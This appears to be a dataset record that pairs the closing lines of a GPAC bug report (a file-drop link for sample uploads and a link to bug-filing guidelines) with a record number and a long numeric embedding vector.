https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ --- end body ---
3,312
[ -0.025503136217594147, 0.014211369678378105, -0.014795290306210518, -0.018953753635287285, -0.0226150956004858, 0.0037737854290753603, -0.03386740759015083, 0.04633490368723869, -0.012309681624174118, 0.02234680764377117, -0.0036356961354613304, -0.027444276958703995, 0.011773105710744858, -0.006071987096220255, -0.020531916990876198, 0.01590789668262005, 0.0006144977523945272, -0.0034719614777714014, 0.01212819293141365, 0.025692515075206757, 0.025692515075206757, -0.004750274587422609, -0.00856943242251873, 0.01969549059867859, 0.009618911892175674, 0.014621692709624767, -0.01579742506146431, 0.004047991707921028, -0.007405536249279976, 0.0067150890827178955, 0.00939007755368948, 0.01896953582763672, -0.010202832520008087, 0.012459606863558292, 0.05725580081343651, -0.0012911356752738357, 0.0683029517531395, 0.02697082795202732, 0.008017074316740036, 0.003915820270776749, -0.02165241539478302, -0.011110276915133, -0.02616596408188343, 0.007204320281744003, -0.026260653510689735, 0.047755252569913864, 0.003726440481841564, 0.008727248758077621, -0.009705710224807262, -0.03266800194978714, 0.016476035118103027, -0.015663281083106995, -0.039959121495485306, -0.02903822436928749, -0.005235560238361359, -0.05561451241374016, 0.05166909843683243, 0.008877173997461796, -0.002698661061003804, 0.04750274494290352, 0.0010208750609308481, -0.004706874955445528, -0.002621725434437394, 0.038570336997509, 0.02114740200340748, 0.012072957120835781, -0.019727053120732307, 0.05012249946594238, -0.03148437663912773, 0.003004430327564478, -0.008640449494123459, -0.04128477722406387, 0.015481792390346527, 0.011891468428075314, 0.03702373430132866, -0.07474186271429062, 0.03875971585512161, 0.02455623634159565, -0.008711467497050762, 0.001042574760504067, -0.046492721885442734, 0.00916124414652586, -0.07758256047964096, 0.006573054473847151, 0.04854433611035347, -0.0016708815237507224, -0.0318157933652401, -0.06546225398778915, -0.01354064978659153, -0.008427397347986698, -0.01859077624976635, 0.03487743064761162, -0.005077743902802467, -0.019600801169872284, 0.009547893889248371, 0.009326951578259468, -0.048481207340955734, 0.015481792390346527, -0.03427772969007492, -0.03317301347851753, -0.052458181977272034, 0.001084001618437469, 0.001418375177308917, -0.028817281126976013, 0.04223167896270752, -0.002481663366779685, 0.011528490111231804, -0.021636633202433586, 0.031121401116251945, 0.11236529797315598, 0.01235702633857727, -0.013603776693344116, 0.024966560304164886, -0.03247862309217453, -0.03304675966501236, 0.009224370121955872, -0.015181940980255604, -0.0132723618298769, -0.01101558655500412, -0.004324170295149088, 0.015671171247959137, -0.03140547126531601, -0.018306706100702286, 0.07114364951848984, -0.00797367561608553, 0.052805379033088684, -0.026670977473258972, -0.014211369678378105, -0.030269192531704903, -0.021352563053369522, -0.02662363275885582, -0.023309487849473953, -0.03083733096718788, -0.01074729859828949, 0.018638120964169502, 0.009997670538723469, -0.025802986696362495, 0.010913006030023098, 0.008940300904214382, 0.01591578684747219, 0.0018730837618932128, -0.031089836731553078, 0.04636646807193756, 0.010834097862243652, 0.008790375664830208, 0.00035755286808125675, 0.007283228449523449, -0.017549186944961548, -0.009177025407552719, 0.018369833007454872, -0.016933703795075417, 0.008916628547012806, -0.02597658522427082, 0.0043320609256625175, 0.04560894891619682, 0.012041393667459488, -0.023577775806188583, 0.009279605932533741, -0.013927300460636616, -0.01870124787092209, -0.00283083226531744, -0.01241226214915514, -0.008632558397948742, -0.0072082653641700745, -0.0011520599946379662, -0.038570336997509, 0.00609960500150919, 0.028170233592391014, -0.013019856065511703, 0.009232261218130589, -0.016554944217205048, -0.008143328130245209, -0.0023909190203994513, 0.022220553830266, -0.0377812534570694, -0.02761787548661232, 0.017012611031532288, 0.02764943800866604, -0.02761787548661232, 0.00004022469511255622, -0.038696590811014175, -0.036897480487823486, -0.009500549174845219, -0.003712631529197097, 0.0425473116338253, -0.032952070236206055, 0.03434085473418236, -0.03263643756508827, 0.0015801370609551668, -0.0034443435724824667, 0.020168939605355263, 0.03175266459584236, 0.0045253862626850605, -0.032762691378593445, -0.011828341521322727, -0.026955045759677887, 0.005058016628026962, -0.046682100743055344, 0.02447732910513878, -0.012783130630850792, -0.0023554102517664433, -0.013288144022226334, 0.007026776671409607, -0.01028963178396225, -0.011410128325223923, 0.015442337840795517, 0.008719357661902905, 0.025455789640545845, -0.004493822809308767, -0.03901222348213196, -0.0175965316593647, -0.014621692709624767, 0.01950611174106598, 0.0069715408608317375, -0.02455623634159565, 0.009129680693149567, 0.00042511802166700363, 0.024587800726294518, -0.02073707990348339, -0.011773105710744858, 0.044662050902843475, -0.0023790826089680195, 0.0016531271394342184, 0.002913685981184244, -0.019269386306405067, -0.022662440314888954, 0.06823982298374176, -0.008143328130245209, -0.037812817841768265, -0.0006071000825613737, 0.020642388612031937, 0.0007067217375151813, -0.005870771128684282, 0.011930922046303749, -0.011181293986737728, 0.015316084958612919, -0.008640449494123459, -0.016775887459516525, -0.01870124787092209, 0.01931673102080822, 0.0083011444658041, 0.04516706243157387, -0.017154647037386894, 0.012222882360219955, -0.005626155994832516, 0.024051224812865257, 0.02616596408188343, 0.020374100655317307, -0.024429984390735626, -0.03610840067267418, -0.014795290306210518, -0.04261043667793274, 0.016270874068140984, -0.008443179540336132, -0.02914869412779808, 0.04018006473779678, 0.03850720822811127, -0.01912735216319561, 0.02149459719657898, -0.04201073572039604, 0.03506680950522423, 0.0032293186523020267, -0.038728151470422745, -0.014321841299533844, 0.016554944217205048, 0.0006080864113755524, -0.007500226143747568, 0.0007708346238359809, 0.01268055010586977, -0.020058467984199524, -0.02869102731347084, -0.02329370565712452, -0.03148437663912773, -0.038538772612810135, -0.0008383998065255582, 0.00018136559810955077, 0.014440203085541725, -0.03939098119735718, 0.018874844536185265, -0.0020654224790632725, 0.01277524046599865, -0.00631265714764595, -0.0028209686279296875, 0.021983828395605087, -0.04131634160876274, 0.010613154619932175, 0.030284972861409187, -0.002698661061003804, -0.04418860003352165, 0.014250824227929115, 0.005318413954228163, 0.015079360455274582, -0.043399520218372345, 0.02207851968705654, 0.007500226143747568, 0.008332707919180393, 0.01107082236558199, 0.007370027247816324, 0.01472427323460579, -0.010628936812281609, -0.012214992195367813, 0.02772834710776806, -0.00856943242251873, -0.018464522436261177, -0.06520974636077881, -0.023404177278280258, -0.038538772612810135, 0.03209986165165901, 0.00263947993516922, -0.012159756384789944, 0.031152963638305664, -0.022583531215786934, -0.0051527065224945545, -0.0016166321001946926, 0.00889295618981123, -0.011275984346866608, 0.01904844306409359, 0.00020096935622859746, 0.002471799962222576, 0.004971217829734087, 0.017107300460338593, -0.020326755940914154, -0.05053282156586647, 0.018685465678572655, -0.0036495050881057978, -0.02138412743806839, -0.018795937299728394, -0.016917921602725983, -0.06786106526851654, 0.014913653023540974, 0.009816181845963001, 0.012759458273649216, -0.005728736519813538, -0.006229803431779146, 0.004951490554958582, -0.0205792635679245, -0.0258976761251688, -0.011638961732387543, 0.020247848704457283, -0.0017182263545691967, -0.04469361528754234, -0.012672659941017628, 0.015923678874969482, -0.008466851897537708, -0.0040184007957577705, -0.007137248292565346, -0.02326214127242565, 0.008979754522442818, 0.05485699325799942, -0.03954879939556122, 0.0011461417889222503, 0.026986610144376755, 0.011126058176159859, 0.024240603670477867, 0.040495697408914566, -0.0001670634956099093, -0.022694002836942673, 0.0000587496324442327, 0.005353922490030527, 0.009311169385910034, 0.05141659453511238, -0.028249140828847885, -0.002876204438507557, 0.036045271903276443, 0.02038988284766674, 0.0005084648146294057, -0.03462492674589157, -0.03172110393643379, -0.023056980222463608, 0.015174049884080887, -0.036013711243867874, 0.00889295618981123, -0.07613064348697662, 0.016191966831684113, -0.03797063231468201, 0.015032014809548855, 0.008829829283058643, -0.03355177491903305, -0.07278493791818619, 0.014124570414423943, -0.046461157500743866, 0.0062100766226649284, 0.03932785615324974, -0.012585860677063465, 0.014408640563488007, 0.05719267576932907, 0.028706809505820274, 0.0010820289608091116, -0.01564749889075756, -0.010952460579574108, -0.013422288000583649, 0.010045016184449196, -0.01652337983250618, -0.026955045759677887, -0.01055791974067688, -0.0055314661003649235, -0.012254445813596249, -0.025155939161777496, 0.012641096487641335, -0.046429593116045, 0.004193971864879131, 0.01309876423329115, 0.0009902981109917164, 0.024161696434020996, 0.009027100168168545, 0.030553260818123817, -0.0025368991773575544, 0.01516615878790617, 0.001677786000072956, -0.020137377083301544, 0.0014805153477936983, -0.0166022889316082, -0.03083733096718788, -0.004367569927126169, 0.018464522436261177, 0.025187501683831215, 0.036581847816705704, -0.0003760469553526491, -0.041032273322343826, 0.03415147587656975, -0.005783972330391407, 0.025124376639723778, -0.014164024963974953, 0.003016266506165266, 0.0010997832287102938, 0.011583725921809673, -0.0014282386982813478, 0.004789728671312332, 0.05321570113301277, -0.01300407387316227, 0.036045271903276443, -0.03970661386847496, -0.01690213941037655, -0.04327326640486717, -0.0018237661570310593, 0.008498414419591427, -0.028028197586536407, -0.0037915396969765425, 0.010321194306015968, -0.008340598084032536, -0.052994757890701294, -0.010147596709430218, -0.005858934950083494, 0.009950325824320316, 0.05902334675192833, -0.010210723616182804, -0.045577384531497955, -0.020342538133263588, -0.0030478299595415592, -0.020184721797704697, 0.002580298576503992, 0.03733936697244644, -0.015513354912400246, -0.059307415038347244, -0.027949290350079536, 0.00820645410567522, -0.024950778111815453, -0.013067200779914856, 0.009563676081597805, -0.0006588835967704654, -0.026023929938673973, 0.03784438222646713, 0.006217967253178358, -0.0013562350068241358, 0.005799754057079554, -0.008190672844648361, -0.017044175416231155, -0.01786481961607933, 0.015323975123465061, -0.012562188319861889, -0.013872064650058746, 0.004359678830951452, -0.0020673952531069517, 0.022046955302357674, 0.004316279198974371, 0.00826168991625309, -0.008869283832609653, -0.039454106241464615, 0.012001940049231052, -0.024729834869503975, 0.013501196168363094, -0.047376491129398346, 0.05321570113301277, 0.023593556135892868, -0.014582238160073757, -0.017154647037386894, 0.0025073084980249405, -0.03973817825317383, -0.009997670538723469, 0.004438586998730898, 0.01191514078527689, -0.005910225212574005, 0.011457473039627075, -0.017091520130634308, -0.01457434706389904, 0.011126058176159859, 0.004024318885058165, -0.013816828839480877, 0.018638120964169502, 0.008664121851325035, -0.020926458761096, -0.014700600877404213, -0.002521117450669408, 0.002515199361369014, 0.01613673008978367, -0.004138736054301262, -0.0009607075480744243, 0.05046969652175903, -0.030016684904694557, -0.03121609054505825, -0.01214397419244051, -0.026528941467404366, 0.00009493644756730646, -0.026765666902065277, -0.011173403821885586, -0.03733936697244644, -0.024240603670477867, -0.01974283531308174, 0.029054004698991776, 0.00856943242251873, 0.0008739085169509053, -0.0005257260054349899, -0.00005239998790784739, 0.0302218459546566, -0.01679166778922081, 0.006995213218033314, -0.007397645153105259, -0.021589288488030434, 0.023356832563877106, -0.017312463372945786, -0.0338042788207531, -0.010581592097878456, 0.020168939605355263, 0.04210542514920235, -0.0077172233723104, 0.012964620254933834, -0.00442675082013011, 0.019411420449614525, 0.024871869012713432, 0.004067718517035246, -0.014834744855761528, 0.027412714436650276, -0.011780996806919575, 0.016823232173919678, -0.016207747161388397, 0.019458765164017677, -0.012783130630850792, 0.004912036471068859, -0.0292276032269001, -0.020973803475499153, 0.017091520130634308, -0.014408640563488007, 0.011086604557931423, 0.018685465678572655, 0.007780350279062986, 0.0038231031503528357, 0.024114351719617844, 0.002532953629270196, 0.00831692572683096, 0.016618071123957634, -0.009137571789324284, -0.002069368027150631, 0.0055748652666807175, -0.0013690575724467635, -0.005219778511673212, -0.005484120920300484, -0.011402237229049206, 0.016649633646011353, -0.04371515288949013, 0.017375588417053223, -0.004624021239578724, -0.01743871532380581, 0.0006943923071958125, 0.004655584692955017, 0.016917921602725983, -0.0045885127037763596, 0.002162085147574544, -0.02532953768968582, -0.00042684414074756205, 0.008695685304701328, 0.024572018533945084, -0.024508891627192497, 0.02624487318098545, 0.0062929303385317326, -0.003055720590054989, -0.021100057289004326, 0.029890432953834534, 0.009745164774358273, -0.019679708406329155, -0.011220748536288738, 0.01375370193272829, 0.037623438984155655, 0.012704222463071346, -0.02176288515329361, 0.013872064650058746, -0.004241316579282284, -0.003243127604946494, 0.04459892213344574, 0.025724077597260475, -0.016854794695973396, -0.031610630452632904, 0.05482542887330055, -0.03453023359179497, -0.019900651648640633, 0.013619557954370975, 0.008916628547012806, 0.012696332298219204, 0.018117327243089676, -0.04589301720261574, 0.03759187459945679, -0.0226150956004858, 0.021557724103331566, 0.04803932085633278, 0.0006268271245062351, 0.005858934950083494, 0.01402198988944292, 0.031579069793224335, 0.0026592069771140814, -0.008782484568655491, 0.016554944217205048, 0.030995147302746773, -0.03254174813628197, 0.036045271903276443, -0.03399365767836571, 0.011291765607893467, 0.03910691291093826, -0.009508440271019936, -0.010242286138236523, -0.005563029088079929, -0.02439842000603676, -0.03067951463162899, 0.019332513213157654, -0.00787898525595665, -0.037118423730134964, -0.0001364865602226928, -0.01133911032229662, 0.028706809505820274, 0.006431019399315119, 0.004758165217936039, -0.030363881960511208, -0.020295193418860435, -0.003191837342455983, -0.014258714392781258, 0.012783130630850792, -0.02160506881773472, 0.03958036005496979, 0.003464070614427328, -0.002876204438507557, 0.02307276241481304, 0.03983286768198013, -0.011354892514646053, -0.008095983415842056, 0.04191604256629944, 0.03178422898054123, 0.016057822853326797, -0.041442595422267914, 0.04784994199872017, 0.03148437663912773, 0.0011323329526931047, 0.010550028644502163, -0.023767154663801193, 0.002974839648231864, 0.007634370122104883, -0.021052712574601173, 0.027223333716392517, 0.01713886484503746, 0.005073798354715109, -0.0007950002909637988, -0.009516330435872078, 0.03503524884581566, 0.00939007755368948, -0.01515037752687931, -0.00256254430860281, -0.0046476940624415874, 0.0011964457808062434, 0.0018030527280643582, 0.007563352584838867, 0.0016837040893733501, 0.022851819172501564, 0.00404404615983367, -0.010723626241087914, -0.00027938440325669944, -0.010928788222372532, 0.013611666858196259, -0.00007335998088819906, 0.005858934950083494, -0.0010465201921761036, 0.005519629921764135, 0.0036929044872522354, 0.005582756362855434, 0.05788706615567207, 0.01955345645546913, 0.017691222950816154, 0.04999624565243721, -0.0014923516428098083, -0.004706874955445528, 0.011954594403505325, 0.005926006939262152, -0.012751568108797073, -0.010739408433437347, -0.017501842230558395, 0.007658042479306459, 0.012175537645816803, -0.0063955108635127544, -0.006801888346672058, 0.014645365066826344, -0.01382471900433302, -0.0007155988714657724, -0.01084198895841837, 0.003813239512965083, 0.015592263080179691, -0.0036652865819633007, 0.0076698786579072475, 0.00960312969982624, 0.0019431147957220674, 0.0044030784629285336, -0.02562938816845417, -0.030016684904694557, -0.02479296177625656, 0.025802986696362495, 0.01698104850947857, -0.016649633646011353, -0.006352111231535673, -0.03629777953028679, -0.011141840368509293, 0.005590646993368864, 0.01176521461457014, 0.022362587973475456, -0.01082620769739151, 0.00960312969982624, -0.024319512769579887, -0.029543235898017883, 0.004190026316791773, 0.0199322160333395, -0.02050035446882248, 0.02383028157055378, -0.0172493364661932, 0.014337622560560703, 0.012364917434751987, 0.04036944359540939, -0.00631265714764595, -0.010652609169483185, -0.006916305050253868, -0.016744323074817657, 0.00007490115967812017, -0.016270874068140984, 0.008821938186883926, 0.008821938186883926, 0.01740715280175209, -0.02753896825015545, 0.01567906327545643, 0.014621692709624767, 0.00921647995710373, -0.040306318551301956, -0.010944569483399391, 0.00889295618981123, 0.028201796114444733, -0.005843153223395348, -0.008727248758077621, -0.02842273935675621, 0.02165241539478302, -0.008127545937895775, -0.024840306490659714, -0.014416530728340149, 0.003308227052912116, -0.02861211821436882, 0.011465364135801792, -0.007946057245135307, -0.00012317078653723001, -0.013280252926051617, -0.020405665040016174, -0.0005592620000243187, -0.0009414736414328218, -0.02046879194676876, 0.028848843649029732, 0.013422288000583649, -0.013248689472675323, 0.023135889321565628, -0.0009385145967826247, -0.0032234005630016327, -0.02267822064459324, -0.00035681307781487703, -0.026670977473258972, 0.020894896239042282, 0.0012260364601388574, -0.022236336022615433, 0.0391700379550457, 0.00237119197845459, -0.00803285650908947, 0.004296552389860153, 0.004990944638848305, -0.003010348416864872, 0.03393053263425827, -0.030853113159537315, 0.024682490155100822, -0.015118814073503017, 0.00040218530921265483, 0.020058467984199524, -0.035666514188051224, -0.009611020796000957, 0.002349492162466049, -0.019648145884275436, 0.012404371984302998, -0.008735139854252338, -0.030726859346032143, -0.018795937299728394, -0.019679708406329155, -0.020705515518784523, -0.01923782378435135, 0.04346264526247978, -0.019521892070770264, -0.0067861066199839115, -0.001069206278771162, -0.024429984390735626, 0.010644718073308468, -0.004939654376357794, 0.007800077088177204, 0.004584567155689001, -0.047913067042827606, 0.042168550193309784, -0.040337879210710526, 0.005874716676771641, 0.012491170316934586, -0.024840306490659714, -0.00318394647911191, -0.04150572046637535, 0.0008768675616011024, 0.03307832404971123, 0.02559782564640045, 0.008103873580694199, 0.007634370122104883, 0.002609889255836606, -0.0305216982960701, 0.00024288934946525842, -0.03973817825317383, 0.007153029553592205, -0.012585860677063465, -0.006079878192394972, -0.01797529123723507, 0.01074729859828949, 0.0001718719577183947, -0.0006825560703873634, 0.0014134434750303626, -0.008080201223492622, -0.006470473948866129, -0.014803181402385235, 0.0007086943951435387, -0.03497212007641792, 0.0271917711943388, 0.02253618650138378, 0.015560700558125973, 0.024272168055176735, 0.038885969668626785, 0.008948192000389099, -0.03500368446111679, 0.0006786106387153268, 0.02160506881773472, 0.04327326640486717, 0.026607850566506386, -0.021510379388928413, 0.030663732439279556, -0.007646206300705671, -0.03162641450762749, -0.01402198988944292, 0.02452467381954193, 0.014416530728340149, 0.016823232173919678, -0.05933897942304611, -0.04636646807193756, 0.04074820131063461, -0.02731802500784397, -0.02272556535899639, -0.0026000256184488535, -0.003947383724153042, -0.012822585180401802, 0.010692063719034195, -0.024572018533945084, 0.020563481375575066, -0.010976132936775684, -0.009500549174845219, 0.006884742062538862, -0.016823232173919678, -0.013398614712059498, 0.008111764676868916, 0.00242445501498878, -0.02195226587355137, -0.013698466122150421, -0.006269257981330156, -0.03030075505375862, -0.019711272791028023, 0.02345152199268341, -0.032573312520980835, -0.030853113159537315, 0.014661146327853203, -0.015544918365776539, 0.023577775806188583, -0.01904844306409359, -0.028675245121121407, -0.013935190625488758, -0.02551891654729843, -0.00732662808150053, 0.008411616086959839, -0.011465364135801792, 0.0037363041192293167, 0.007452880963683128, 0.004111118149012327, 0.012009830214083195, 0.008458960801362991, -0.004817346576601267, -0.01786481961607933, -0.007772459182888269, -0.029353857040405273, 0.024303730577230453, -0.002179839415475726, -0.022125864401459694, -0.035098373889923096, -0.031310781836509705, -0.015394993126392365, 0.02114740200340748, 0.012704222463071346, -0.0013848391827195883, 0.016744323074817657, 0.0023672464303672314, 0.020863331854343414, 0.0020052550826221704, -0.0062100766226649284, -0.0275863129645586, 0.004998835269361734, -0.027980852872133255, -0.0021088221110403538, 0.012191319838166237, -0.001684690359979868, -0.016839012503623962, -0.00441886018961668, 0.008877173997461796, -0.022820256650447845, -0.005322359036654234, -0.0012940947199240327, -0.010116033256053925, -0.04598770663142204, 0.0126253142952919, 0.009674147702753544, -0.008806156925857067, -0.011031368747353554, 0.01191514078527689, 0.006987322587519884, -0.008458960801362991, -0.006805833429098129, -0.032415494322776794, -0.007101739291101694, -0.022204771637916565, -0.026213308796286583, -0.023735592141747475, -0.013682684861123562, -0.026639413088560104, -0.013477522879838943, -0.03217877075076103, -0.0192851684987545, 0.022630875930190086, 0.022204771637916565, 0.013856282457709312, 0.012120301835238934, -0.007358191069215536, -0.003120820038020611, 0.00921647995710373, 0.010581592097878456, -0.027759909629821777, 0.011181293986737728, 0.00005992092701490037, -0.011410128325223923, -0.00523950532078743, -0.011907249689102173, 0.0017823392990976572, -0.007756677456200123, 0.004738438408821821, 0.040685076266527176, -0.0007190511096268892, -0.02869102731347084, -0.01920625939965248, -0.01996377855539322, -0.007358191069215536, -0.004975162912160158, 0.013114545494318008, -0.02971683442592621, -0.009760946035385132, -0.013106654398143291, 0.00005770163261331618, 0.003568624146282673, 0.011662634089589119, 0.003404889488592744, 0.00391187472268939, 0.0058510443195700645, 0.016854794695973396, -0.018306706100702286, 0.03399365767836571, -0.01705995574593544, 0.0021818121895194054, -0.0157579705119133, -0.0052750143222510815, -0.047534309327602386, -0.04750274494290352, 0.0024560182355344296, -0.009397968649864197, 0.02968527004122734, -0.004983054008334875, 0.015047797001898289, 0.008427397347986698, 0.011899358592927456, -0.03263643756508827, -0.024272168055176735, -0.03705529868602753, 0.014605910517275333, 0.010123924352228642, -0.01107082236558199, -0.013722138479351997, 0.015971023589372635, -0.03822313994169235, -0.002834777580574155, -0.015189831145107746, 0.017770130187273026, 0.006924196146428585, 0.011725760996341705, 0.0052039967849850655, -0.024998122826218605, 0.011394346132874489, 0.020563481375575066, -0.023593556135892868, -0.007906603626906872, -0.0062100766226649284, 0.012814694084227085, 0.0011471281759440899, 0.014195588417351246, -0.00008513456850778311, 0.003905956633388996, -0.010163377970457077, -0.038885969668626785, 0.0032174824737012386, -0.005933898035436869, -0.020642388612031937, 0.01713886484503746, 0.02229946106672287, -0.003347681136801839, -0.01878015510737896, -0.020752860233187675, 0.004943599924445152, -0.02367246523499489, 0.011457473039627075, 0.046839915215969086, -0.006470473948866129, -0.01690213941037655, 0.019174696877598763, -0.014874198473989964, 0.05889709293842316, -0.0005740572814829648, 0.0011461417889222503, -0.008711467497050762, 0.005014616996049881, 0.012270228005945683, 0.011962485499680042, 0.005065907258540392, -0.0052237240597605705, -0.0344986729323864, 0.00799340195953846, -0.016807449981570244, -0.040558822453022, -0.02409856952726841, -0.022173209115862846, 0.003846775507554412, -0.0037639217916876078, 0.013382833451032639, 0.02253618650138378, -0.010321194306015968, -0.0044030784629285336, -0.00359032372944057, 0.0035765147767961025, -0.006064096465706825, 0.00910600833594799, -0.015063578262925148, -0.005610374268144369, -0.0012250500731170177, -0.031042492017149925, -0.020168939605355263, -0.0026118620298802853, 0.00588260730728507, -0.047597434371709824, 0.0005651800893247128, -0.007026776671409607, -0.013201344758272171, 0.022473059594631195, -0.033678025007247925, -0.013382833451032639, -0.014732164330780506, -0.016239311546087265, -0.023735592141747475, -0.014479657635092735, 0.0013335488038137555, -0.00007372986146947369, 0.08414772152900696, 0.020752860233187675, 0.0021818121895194054, -0.019805962219834328, -0.039990682154893875, -0.016996828839182854, 0.011757324449717999, 0.0012546406360343099, 0.03393053263425827, -0.016618071123957634, 0.02746005915105343, -0.021336780861020088, -0.013950972817838192, 0.004002619069069624, 0.0012684495886787772, -0.004336006473749876, 0.003318090457469225, -0.016089385375380516, 0.009468985721468925, 0.015355538576841354, 0.025487354025244713, 0.013280252926051617, 0.02375137247145176, -0.002162085147574544, 0.004241316579282284, -0.02727068029344082, 0.012783130630850792, -0.01805420033633709, -0.009342732839286327, -0.01931673102080822, -0.0126253142952919, 0.009800400584936142, -0.01466903742402792, -0.00971360132098198, -0.005732682067900896, 0.0076501513831317425, 0.018069980666041374, -0.012577969580888748, 0.017533404752612114, -0.018574994057416916, 0.0017872711177915335, -0.00856943242251873, 0.006060150917619467, -0.01436129491776228, 0.0018168616807088256, -0.028391176834702492, 0.021336780861020088, 0.0018967562355101109, -0.026213308796286583, 0.000904978602193296, -0.001125428476370871, -0.02038988284766674, 0.016775887459516525, 0.03841251879930496, -0.009579457342624664, 0.005464394111186266, 0.003087284043431282, 0.001857302151620388, 0.046997733414173126, -0.020358320325613022, 0.010076579637825489, 0.000014263584489526693, -0.004908090922981501, 0.03235236927866936, 0.0015613962896168232, -0.00034078487078659236, 0.01191514078527689, 0.020358320325613022, 0.00007946303958306089, 0.012317572720348835, 0.021100057289004326, -0.002197593916207552, 0.007259556092321873, -0.009784618392586708, 0.00831692572683096, 0.03935941681265831, -0.030206065624952316, -0.0018356023356318474, -0.015623826533555984, -0.0005824412801302969, 0.018732810392975807, 0.021084275096654892, -0.0064783645793795586, 0.01920625939965248, 0.003503524698317051, 0.0061508952639997005, -0.005097470711916685, -0.01375370193272829, 0.0020437228959053755, -0.012964620254933834, 0.013777374289929867, 0.00787898525595665, -0.003669232130050659, 0.0006850219797343016, -0.01579742506146431, 0.010810425505042076, -0.005235560238361359, -0.01332759764045477, -0.0205792635679245, 0.014645365066826344, -0.0014114707009866834, -0.006746652536094189, 0.02723911590874195, 0.01572640798985958, -0.019001098349690437, 0.01974283531308174, 0.001615645713172853, 0.01982174441218376, -0.0018987288931384683, -0.011062932200729847, -0.053341954946517944, -0.012538515962660313, 0.024224821478128433, -0.014787400141358376, -0.0012260364601388574, -0.020216284319758415, -0.006663798820227385, 0.003765894565731287, 0.012333353981375694, -0.02482452429831028, -0.015426556579768658, 0.012925165705382824, 0.007354245521128178, -0.016570724546909332, -0.0006894605467095971, 0.009705710224807262, -0.0005784958484582603, -0.046461157500743866, 0.04207386076450348, 0.007224047090858221, 0.04362046346068382, 0.03415147587656975, -0.0017369671259075403, 0.011354892514646053, 0.035824328660964966, -0.01901688054203987, 0.0071648661978542805, -0.010384321212768555, 0.01047901064157486, -0.014929434284567833, -0.004568785894662142, 0.035855893045663834, 0.013035637326538563, 0.01870124787092209, 0.03500368446111679, -0.011520599946379662, -0.01384839229285717, 0.0077211689203977585, 0.02195226587355137, 0.00831692572683096, -0.0022626931313425303, 0.009563676081597805, 0.013422288000583649, 0.02095802128314972, 0.002150248968973756, 0.027570530772209167, 0.03170531988143921, -0.0014016071800142527, -0.004876527935266495, 0.01300407387316227, -0.0003967603843193501, 0.022709785029292107, 0.011433800682425499, -0.007618588395416737, 0.0010830152314156294, 0.01679166778922081, 0.011220748536288738, -0.0524897463619709, -0.005843153223395348, -0.01870124787092209, 0.010928788222372532, 0.0005429871380329132, -0.013398614712059498, -0.010029233992099762, 0.015442337840795517, 0.00998188927769661, -0.011118168011307716, -0.014321841299533844, -0.009034990333020687, 0.0007634370122104883, -0.015087250620126724, 0.03121609054505825, -0.01602625846862793, -0.0011609371285885572, 0.02845430187880993, -0.01185990497469902, 0.017549186944961548, -0.011489036493003368, -0.02716020867228508, 0.018038418143987656, -0.008395833894610405, 0.008443179540336132, -0.012846257537603378, -0.02608705684542656, -0.013564322143793106, -0.018527649343013763, 0.0077842953614890575, 0.0037224951665848494, -0.00044953025644645095, 0.00885350164026022, 0.0067229801788926125, -0.010952460579574108, 0.0005513711366802454, -0.013469632714986801, 0.009808291681110859, -0.024035442620515823, 0.025724077597260475, 0.003539033466950059, -0.01901688054203987, -0.01321712601929903, 0.0032628546468913555, -0.005795808508992195, -0.017722785472869873, -0.015387102030217648, 0.019032660871744156, 0.004280770663172007, 0.013248689472675323, -0.02895931527018547, 0.010707844980061054, 0.013974645175039768, -0.03610840067267418, -0.0021029040217399597, 0.005243450868874788, 0.00820645410567522, 0.007673824205994606, -0.012862038798630238, 0.021715540438890457, -0.011457473039627075, -0.008640449494123459, 0.01384839229285717, 0.01122863870114088, 0.02353042922914028, 0.017154647037386894, 0.009082335978746414, -0.006671689450740814, -0.008009184151887894, 0.0025428172666579485, 0.0019776371773332357, 0.006115386728197336, -0.012877820990979671, -0.0015426556346938014, 0.007145138923078775, -0.017533404752612114, -0.00042807706631720066, -0.021968048065900803, -0.00015128184168133885, 0.021510379388928413, 0.01939564011991024, -0.011954594403505325, 0.02100536786019802, -0.016081495210528374, 0.007926329970359802, 0.00998188927769661, -0.0040756091475486755, -0.0033792443573474884, 0.025724077597260475, -0.0009074445115402341, 0.003085311269387603, 0.02498234063386917, -0.0438414067029953, -0.0005148760974407196, -0.010542137548327446, -0.02168397791683674, 0.004998835269361734, -0.01348541397601366, 0.04273669049143791, 0.013564322143793106, -0.005164542701095343, -0.020563481375575066, 0.02624487318098545, -0.006707198452204466, -0.0074844444170594215, 0.011425909586250782, 0.00592995248734951, -0.015671171247959137, 0.03205251693725586, -0.013067200779914856, -0.03317301347851753, -0.0182435791939497, -0.003765894565731287, 0.006454692222177982, 0.06937610357999802, -0.001235899981111288, -0.0035094430204480886, -0.006498091388493776, 0.0032904725521802902, -0.000056283752201125026, -0.04137946665287018, -0.008044692687690258, -0.004746329039335251, 0.0074134268797934055, 0.004821292124688625, -0.01268055010586977, -0.0107867531478405, 0.00971360132098198, -0.011686306446790695, -0.023514648899435997, 0.02605549246072769, -0.00987141765654087, -0.018022635951638222, 0.01893797144293785, 0.002150248968973756, 0.02520328387618065, 0.0157579705119133, -0.00030207051895558834, 0.01786481961607933, 0.0010356702841818333, -0.006071987096220255, 0.010060797445476055, -0.0046595302410423756, 0.047913067042827606, -0.0025073084980249405, -0.020595043897628784, 0.0010248204926028848, 0.005452557932585478, 0.011883577331900597, 0.0024205094669014215, 0.014787400141358376, 0.008458960801362991, -0.00987141765654087, 0.0344986729323864, 0.024777179583907127, 0.009232261218130589, -0.029164476320147514, 0.010013452731072903, -0.009279605932533741, 0.006403401959687471, -0.015497573651373386, 0.0036416142247617245, -0.004975162912160158, 0.021936483681201935, 0.005318413954228163, 0.010676281526684761, -0.002487581456080079, 0.008987645618617535, -0.001439088606275618, 0.0065927812829613686, 0.01955345645546913, -0.008537868969142437, -0.003335844725370407, -0.020026905462145805, 0.026860356330871582, -0.013651121407747269, -0.01969549059867859, -0.010668390430510044, -0.0010386294452473521, 0.017691222950816154, 0.010376430116593838, 0.006821615155786276, 0.010415884666144848, 0.02076864242553711, 0.010818316601216793, -0.02237837016582489, 0.028785716742277145, -0.009682037867605686, -0.0017004720866680145, -0.001839547767303884, -0.02211008220911026, -0.0011599507415667176, -0.012672659941017628, -0.013714248314499855, 0.03661341220140457, -0.00939007755368948, -0.014818962663412094, -0.016318218782544136, 0.026607850566506386, -0.015931569039821625, 0.0035942692775279284, -0.00620613107457757, -0.016744323074817657, 